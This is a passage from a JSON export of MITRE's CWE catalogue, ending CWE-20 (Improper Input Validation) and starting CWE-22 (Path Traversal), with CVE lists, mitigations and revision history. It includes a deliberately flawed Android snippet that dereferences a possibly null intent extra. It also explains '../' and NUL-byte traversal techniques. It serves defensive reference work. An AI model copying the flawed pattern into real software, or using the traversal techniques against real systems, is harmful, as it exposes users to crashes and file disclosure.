onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5305","Description":"Eval injection in Perl program using an ID that should only contain hyphens and numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305"},{"Reference":"CVE-2008-2223","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223"},{"Reference":"CVE-2008-3477","Description":"lack of input validation in spreadsheet program leads to buffer overflows, integer overflows, array index errors, and memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3477"},{"Reference":"CVE-2008-3843","Description":"insufficient validation enables XSS","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3843"},{"Reference":"CVE-2008-3174","Description":"driver in security product allows code execution due to insufficient validation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3174"},{"Reference":"CVE-2007-3409","Description":"infinite loop from DNS packet with a label that points to itself","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3409"},{"Reference":"CVE-2006-6870","Description":"infinite loop from DNS packet with a label that points to itself","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6870"},{"Reference":"CVE-2008-1303","Description":"missing parameter leads to crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1303"},{"Reference":"CVE-2007-5893","Description":"HTTP request with missing protocol version number leads to crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5893"},{"Reference":"CVE-2006-6658","Description":"request with missing parameters leads to information exposure","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6658"},{"Reference":"CVE-2008-4114","Description":"system crash with offset value that is inconsistent with packet size","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114"},{"Reference":"CVE-2006-3790","Description":"size field that is inconsistent with packet size leads to buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3790"},{"Reference":"CVE-2008-2309","Description":"product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2309"},{"Reference":"CVE-2008-3494","Description":"security bypass via an extra header","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3494"},{"Reference":"CVE-2008-3571","Description":"empty packet triggers reboot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3571"},{"Reference":"CVE-2006-5525","Description":"incomplete denylist allows SQL injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5525"},{"Reference":"CVE-2008-1284","Description":"NUL byte in theme name causes directory traversal impact to be worse","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1284"},{"Reference":"CVE-2008-0600","Description":"kernel does not validate an incoming pointer before dereferencing it","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600"},{"Reference":"CVE-2008-1738","Description":"anti-virus product has insufficient input validation of hooked SSDT functions, allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1738"},{"Reference":"CVE-2008-1737","Description":"anti-virus product allows DoS via zero-length field","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1737"},{"Reference":"CVE-2008-3464","Description":"driver does not validate input from userland to the kernel","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3464"},{"Reference":"CVE-2008-2252","Description":"kernel does not validate parameters sent in from userland, allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2252"},{"Reference":"CVE-2008-2374","Description":"lack of validation of string length fields allows memory consumption or buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2374"},{"Reference":"CVE-2008-1440","Description":"lack of validation of length field leads to infinite loop","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1440"},{"Reference":"CVE-2008-1625","Description":"lack of validation of input to an IOCTL allows code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1625"},{"Reference":"CVE-2008-3177","Description":"zero-length attachment causes crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3177"},{"Reference":"CVE-2007-2442","Description":"zero-length input causes free of uninitialized pointer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442"},{"Reference":"CVE-2008-5563","Description":"crash via a malformed frame structure","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5563"},{"Reference":"CVE-2008-5285","Description":"infinite loop from a long SMTP request","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5285"},{"Reference":"CVE-2008-3812","Description":"router crashes with a malformed packet","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3812"},{"Reference":"CVE-2008-3680","Description":"packet with invalid version number leads to NULL pointer dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3680"},{"Reference":"CVE-2008-3660","Description":"crash via multiple \\".\\" characters in file extension","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3660"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Input validation and representation"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR07-C","Entry_Name":"Prefer functions that support error checking over equivalent functions that don\'t"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO30-C","Entry_Name":"Exclude user input from format strings","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM10-C","Entry_Name":"Define and use a pointer validation function"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":20,"Entry_Name":"Improper Input Handling"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"101"}},{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"109"}},{"attr":{"@_CAPEC_ID":"110"}},{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"135"}},{"attr":{"@_CAPEC_ID":"136"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"153"}},{"attr":{"@_CAPEC_ID":"182"}},{"attr":{"@_CAPEC_ID":"209"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"23"}},{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"261"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"28"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"473"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"588"}},{"attr":{"@_CAPEC_ID":"63"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"664"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"83"}},{"attr":{"@_CAPEC_ID":"85"}},{"attr":{"@_CAPEC_ID":"88"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-166"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-168","@_Section":"Input Validation Attacks"}},{"attr":{"@_External_Reference_ID":"REF-48"}},{"attr":{"@_External_Reference_ID":"REF-170"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 10, "All Input Is Evil!" Page 341"}},{"attr":{"@_External_Reference_ID":"REF-1109"}},{"attr":{"@_External_Reference_ID":"REF-1110"}},{"attr":{"@_External_Reference_ID":"REF-1111"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":"CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks."},{"#text":"As of 2020, this entry is used more often than preferred, and it is a source of frequent confusion. It is being actively modified for CWE 4.1 and subsequent versions.","attr":{"@_Type":"Maintenance"}},{"#text":"Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document.","attr":{"@_Type":"Maintenance"}},{"#text":"Input validation - whether missing or incorrect - is such an essential and widespread part of secure development that it is implicit in many different weaknesses. Traditionally, problems such as buffer overflows and XSS have been classified as input validation problems by many security professionals. However, input validation is not necessarily the only protection mechanism available for avoiding such problems, and in some cases it is not even sufficient. The CWE team has begun capturing these subtleties in chains within the Research Concepts view (CWE-1000), but more work is needed.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Terminology"},"xhtml:p":["The \\"input validation\\" term is extremely common, but it is used in many different ways. In some cases its usage can obscure the real underlying weakness or otherwise hide chaining and composite relationships.","Some people use \\"input validation\\" as a general term that covers many different neutralization techniques for ensuring that input is appropriate, such as filtering, canonicalization, and escaping. Others use the term in a more narrow context to simply mean \\"checking if an input conforms to expectations without changing it.\\" CWE uses this more narrow interpretation."]}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, Relationships, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Input Validation","attr":{"@_Date":"2009-01-12"}}}},"22":{"attr":{"@_ID":"22","@_Name":"Improper Limitation of a Pathname to a Restricted Directory (\'Path Traversal\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.","Extended_Description":{"xhtml:p":["Many file operations are intended to take place within a restricted directory. By using special elements such as \\"..\\" and \\"/\\" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the \\"../\\" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as \\"/usr/local/bin\\", which may also be useful in accessing unexpected files. This is referred to as absolute path traversal.","In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack. For example, the software may add \\".txt\\" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Directory traversal"},{"Term":"Path traversal","Description":"\\"Path traversal\\" is preferred over \\"directory traversal,\\" but both terms are attack-focused."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"Automated techniques can find areas where path traversal weaknesses exist. However, tuning or customization may be required to remove or de-prioritize path-traversal problems that are only exploitable by the software\'s administrator - or other privileged users - and thus potentially valid behavior or, at worst, a bug instead of a vulnerability.","Effectiveness":"High"},{"Method":"Manual Static Analysis","Description":"Manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all file access operations can be assessed within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-20.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.","Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes \\"..\\" sequences and symbolic links (CWE-23, CWE-59). This includes:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["realpath() in C","getCanonicalPath() in Java","GetFullPath() in ASP.NET","realpath() or abs_path() in Perl","realpath() in PHP"]}}}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-21.1"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability."]}},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"attr":{"@_Mitigation_ID":"MIT-34"},"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server\'s access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.","This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface."]}},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to 